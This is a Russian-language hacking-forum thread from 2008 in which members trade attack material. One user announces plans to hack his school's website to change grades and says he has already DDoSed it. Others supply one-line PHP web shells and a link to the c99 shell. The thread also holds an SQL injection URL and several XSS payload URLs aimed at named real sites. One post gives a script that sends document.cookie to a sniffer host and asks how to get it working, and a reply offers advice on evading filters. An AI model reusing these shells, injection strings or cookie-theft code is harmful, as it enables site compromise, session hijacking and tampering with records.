HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 29.11.2008, 06:45
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами: 9799586

Репутация: 1385


По умолчанию

Цитата:
Сообщение от zifanchuck  
круто а вот че мне делать дальш???
попрыгать на левой ноге, сьесть яйцо в смятку, выпить пол литру молока, подтянутся 23 раза и зайти на php.net и mysql.com .. почитать ..
также рекомендуется зайти в раздел /forum30.html и тоже почитать ..

--------
.зы из ошибки, я понял что это нечто типо сайта школы /38school/
Не стоит ломать с надеждой поменять себе отметки!
 
Ответить с цитированием

  #2  
Старый 29.11.2008, 11:18
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами: 10313606

Репутация: 1327
По умолчанию

Цитата:
Сообщение от zifanchuck  
круто а вот че мне делать дальш???
Почитай, может поможет:
Код:
http://forum.antichat.ru/thread91807.html
 
Ответить с цитированием

  #3  
Старый 29.11.2008, 11:36
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
С нами: 9463474

Репутация: 155
По умолчанию

_http://www.vs.motorolka.ru/forum/index.php?showtopic=-1+limit+1,1+union+select+1,2,3--
интересует скули такого вида..их ведь так крутить надо?сначала лимит,а потом юбнион+целест?
 
Ответить с цитированием

  #4  
Старый 29.11.2008, 12:46
zifanchuck
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
С нами: 9230096

Репутация: 464
По умолчанию

Цитата:
.зы из ошибки, я понял что это нечто типо сайта школы /38school/
Не стоит ломать с надеждой поменять себе отметки!
да ты прав))) Отметки потом сменю у меня и у всей школе протест!!! Они нас в школе запирают и не выпускают некуда токо после уроков всех(((( Взломаю потом я его задосил с деда)))
 
Ответить с цитированием

  #5  
Старый 29.11.2008, 13:28
zifanchuck
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
С нами: 9230096

Репутация: 464
По умолчанию

вопрос может не в тему но нужен шел))) на форуме ищу никак ненайду что найду непашут ссылки(( выложите кто-то
 
Ответить с цитированием

  #6  
Старый 29.11.2008, 15:27
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

<?passthru($_GET[cmd]);?>
 
Ответить с цитированием

  #7  
Старый 29.11.2008, 15:37
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
С нами: 9681386

Репутация: 2145


По умолчанию

PHP код:
<?=@`$c`?>
short_open_tag и register_globals required=\

(c) Raz0r
 
Ответить с цитированием

  #8  
Старый 29.11.2008, 16:11
Shaitan-Devil
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
С нами: 9336002

Репутация: 204
По умолчанию

c99comandshell
http://madnet.name/files/1/10.html
 
Ответить с цитированием

Вопрос по xss
  #9  
Старый 29.11.2008, 22:21
qazer
Участник форума
Регистрация: 26.11.2008
Сообщений: 167
С нами: 9187493

Репутация: 112
По умолчанию Вопрос по xss

Нашёл пару xss ,но не могу понять как составить ссылку с адресом сниффера.Помогите,я туплю)

http://www.club-nissan.ru/cars/models/Nissan_Stagea/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

собственно вставка вместо алерта запроса на снифер,вида

<script>img = new Image(); img.src = "блаблабла?"+document.cookie;</script>

не пашет((


В благодарность за ваши советы вот ещё xss (будет супер,если ктонить объяснит как составить ссылки на сниф,т.к. в следующих ,подстановка по методу выше тоже не пашет)

http://www.blogus.ru/tagposts.aspx?id=%D0%B7%D0%B0%D0%B2%D0%BE%D0%B4">< script>alert(document.cookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

http://userinfo.ru/sites/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

http://moemesto.ru/link/1094798'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

http://extremetracking.com/open;ref2?login=magwheel"><script>alert(document.c ookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>
 
Ответить с цитированием

  #10  
Старый 30.11.2008, 12:45
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию

Цитата:
Сообщение от qazer  
Нашёл пару xss ,но не могу понять как составить ссылку с адресом сниффера.Помогите,я туплю)

http://www.club-nissan.ru/cars/models/Nissan_Stagea/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

собственно вставка вместо алерта запроса на снифер,вида

<script>img = new Image(); img.src = "блаблабла?"+document.cookie;</script>

не пашет((


В благодарность за ваши советы вот ещё xss (будет супер,если ктонить объяснит как составить ссылки на сниф,т.к. в следующих ,подстановка по методу выше тоже не пашет)

http://www.blogus.ru/tagposts.aspx?id=%D0%B7%D0%B0%D0%B2%D0%BE%D0%B4">< script>alert(document.cookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

http://userinfo.ru/sites/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

http://moemesto.ru/link/1094798'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

http://extremetracking.com/open;ref2?login=magwheel"><script>alert(document.c ookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>
в большинстве случаях фильтруются некоторые символы, например "+".



Цитата:
Сообщение от Pashkela  
и что, а у меня опера, xss с расчетом на один браузер - гопота.
да, но иногда другого варианта нету. + приемы кроссбраузерности никто не отменял.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.